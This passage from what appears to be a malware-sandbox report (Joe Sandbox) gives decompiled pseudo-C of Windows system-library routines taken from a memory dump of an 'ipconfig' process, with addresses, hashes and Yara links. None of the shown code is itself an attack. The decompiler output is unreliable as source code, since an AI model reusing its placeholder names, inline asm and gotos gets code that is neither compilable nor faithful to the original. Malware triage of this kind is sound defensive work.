					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E02ED98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E02ED95D0();
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































              0x02ecd29c
              0x02ecd2a6
              0x02ecd2b1
              0x02ecd2b5
              0x02ecd2b6
              0x02ecd2bc
              0x02ecd2bd
              0x02ecd2be
              0x02ecd2bf
              0x02ecd2c2
              0x02ecd2c4
              0x02ecd2cc
              0x02ecd384
              0x02ecd34b
              0x02ecd34f
              0x02ecd350
              0x02ecd351
              0x02ecd35c
              0x02ecd35c
              0x02ecd2d6
              0x02ecd2da
              0x02ecd2e1
              0x02ecd361
              0x02ecd369
              0x02ecd36d
              0x02ecd2e3
              0x02ecd2e3
              0x02ecd2e3
              0x02ecd2e5
              0x02ecd2ed
              0x02ecd2f5
              0x02ecd2fa
              0x02ecd302
              0x02ecd303
              0x02ecd30b
              0x02ecd30f
              0x02ecd313
              0x02ecd318
              0x02ecd31c
              0x02ecd320
              0x02ecd379
              0x02ecd37d
              0x00000000
              0x00000000
              0x02f0affe
              0x02f0b001
              0x02f0b011
              0x00000000
              0x02ecd322
              0x02ecd322
              0x02ecd330
              0x02ecd337
              0x02ecd35d
              0x02ecd339
              0x02ecd33f
              0x02ecd38c
              0x02ecd38c
              0x02ecd33f
              0x02ecd349
              0x00000000
              0x02ecd349

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 37b04612743fb2709c200c4615d381d66e6e2e2a01a369d3a69826026fcf4613
              • Instruction ID: c073db3617bff8216529d09844f91c39c1f41aca592622a3537f6fbc2f2b7ae7
              • Opcode Fuzzy Hash: 37b04612743fb2709c200c4615d381d66e6e2e2a01a369d3a69826026fcf4613
              • Instruction Fuzzy Hash: 133190B25883459FC311DF68CE80AABBBE8EF85754F10692EF99483250D735DD06CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E02EA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E02EDBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E02EDA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E02EDA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L02EB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









              0x02ea1b8f
              0x02ea1b9a
              0x02ea1b9c
              0x02ea1b9e
              0x02ea1ba3
              0x02ef7010
              0x02ef7010
              0x00000000
              0x02ea1ba9
              0x02ea1ba9
              0x02ea1bae
              0x00000000
              0x02ea1bc5
              0x02ea1bca
              0x02ea1bcf
              0x02ea1bd0
              0x02ea1bd1
              0x02ea1bd2
              0x02ea1bd6
              0x02ea1bdc
              0x02ea1be0
              0x02ef6ffc
              0x02ef7000
              0x00000000
              0x02ef7006
              0x02ef7009
              0x02ef7009
              0x02ea1be6
              0x02ea1bec
              0x02ea1c0b
              0x02ea1c0b
              0x02ea1c0c
              0x02ea1c11
              0x02ea1c12
              0x02ea1c15
              0x02ea1c1b
              0x02ea1c1f
              0x02ea1c31
              0x02ea1c33
              0x02ef7026
              0x02ef7026
              0x02ea1c21
              0x02ea1c24
              0x02ea1c24
              0x02ea1bee
              0x02ea1bee
              0x02ea1bf2
              0x02ea1c3a
              0x02ea1bf4
              0x02ea1bf4
              0x02ea1c05
              0x02ea1c05
              0x02ea1c09
              0x02ea1c3e
              0x00000000
              0x00000000
              0x00000000
              0x02ea1c09
              0x02ea1bec
              0x02ea1be0
              0x02ea1bae
              0x02ea1c2e

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: WindowsExcludedProcs
              • API String ID: 0-3583428290
              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction ID: f54b42c0e624b64628de376fa4639b0bafd6ee3f40ce237357c52cb5e49b961f
              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction Fuzzy Hash: 9421F837581128ABCB25DA55C850FDBB7ADAF80758F06D465FD088F200D730ED01EBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EBF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











              0x02ebf71d
              0x02ebf722
              0x02ebf726
              0x02f04770
              0x02ebf765
              0x02ebf769
              0x02ebf769
              0x02ebf732
              0x02f0477a
              0x00000000
              0x02f0477a
              0x02ebf738
              0x02ebf73a
              0x02ebf73c
              0x02ebf73f
              0x02ebf746
              0x02ebf778
              0x02ebf7a9
              0x02ebf7a9
              0x02ebf754
              0x02ebf75a
              0x02ebf75d
              0x02ebf75f
              0x02ebf761
              0x02ebf76f
              0x02ebf771
              0x02ebf771
              0x02ebf76f
              0x02ebf763
              0x00000000
              0x02ebf763
              0x02ebf77d
              0x02ebf7a3
              0x02ebf7a5
              0x00000000
              0x02ebf7a5
              0x02ebf77f
              0x02ebf782
              0x02ebf784
              0x02ebf786
              0x00000000
              0x00000000
              0x00000000
              0x02ebf788
              0x02ebf748
              0x02ebf74d
              0x02ebf78d
              0x02ebf793
              0x02ebf7b7
              0x02ebf7bc
              0x00000000
              0x02ebf7bc
              0x02ebf798
              0x00000000
              0x00000000
              0x02ebf79d
              0x02ebf7b0
              0x00000000
              0x02ebf7b0
              0x02ebf79f
              0x00000000
              0x02ebf74f
              0x02ebf74f
              0x00000000
              0x02ebf74f

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Actx
              • API String ID: 0-89312691
              • Opcode ID: 250fd8bfa9eea81b90ede5f880cd72d71b82dfe684cedcfafcf530e280205990
              • Instruction ID: b50b6e2e8eae27e1e908b0563ca1ec167fa4b508d9f83f7777c196ce18aeef2d
              • Opcode Fuzzy Hash: 250fd8bfa9eea81b90ede5f880cd72d71b82dfe684cedcfafcf530e280205990
              • Instruction Fuzzy Hash: 9411D3347A46229BE7264E1D8C907F77295EF8526CF24E5AAF861CBF91D770C800C380
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F48DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E02F48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x2f70d50);
				E02EED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E02F25720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L02EEDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L02EEDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E02EED130(_t34, _t39, _t40);
			}





              0x02f48df1
              0x02f48df1
              0x02f48df1
              0x02f48df1
              0x02f48df1
              0x02f48df1
              0x02f48df3
              0x02f48df8
              0x02f48dfd
              0x02f48e00
              0x02f48e0e
              0x02f48e2a
              0x02f48e36
              0x02f48e38
              0x02f48e3c
              0x02f48e46
              0x02f48e46
              0x02f48e36
              0x02f48e50
              0x02f48e56
              0x02f48e59
              0x02f48e5c
              0x02f48e60
              0x02f48e67
              0x02f48e6d
              0x02f48e73
              0x02f48e74
              0x02f48eb1
              0x02f48ebd

              Strings
              • Critical error detected %lx, xrefs: 02F48E21
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Critical error detected %lx
              • API String ID: 0-802127002
              • Opcode ID: 190980e2d72e1a4469a12cab7365ba328d30cd2ced31d876964b92201dd04271
              • Instruction ID: 28e5cdb3ff95d7c50694695368281fe2d7370f320e8388a0dd9113e0e7a60997
              • Opcode Fuzzy Hash: 190980e2d72e1a4469a12cab7365ba328d30cd2ced31d876964b92201dd04271
              • Instruction Fuzzy Hash: 8C11AD71D50348EBDF24DFE489057ECBBB5BB04794F20825EE62AAB291C7744601CF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F2FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
              Download Yara Rule
              Strings
              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02F2FF60
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
              • API String ID: 0-1911121157
              • Opcode ID: dae3bc58d8d9cd1fc29aabd0e2c34867a0a737e0d5068c923b83fa6295d8e833
              • Instruction ID: c7507ad09b6d25fd3a5a66e7ac2ab23be8e63159260f1efbf483187dfd2a46b0
              • Opcode Fuzzy Hash: dae3bc58d8d9cd1fc29aabd0e2c34867a0a737e0d5068c923b83fa6295d8e833
              • Instruction Fuzzy Hash: 7E1104719A0158EFEF11EB50CD48FA8B7B2FF0A748F54C254F6099B6A0C7389954CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F65BA5 Relevance: .6, Instructions: 592COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E02F65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x2f71178);
				E02EED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E02F64C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E02EDD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E02F65542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x2f860e8;
								if( *0x2f860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x2f860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E02ED9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E02ED6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E02EDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E02EDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E02EDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E02EDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E02EDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
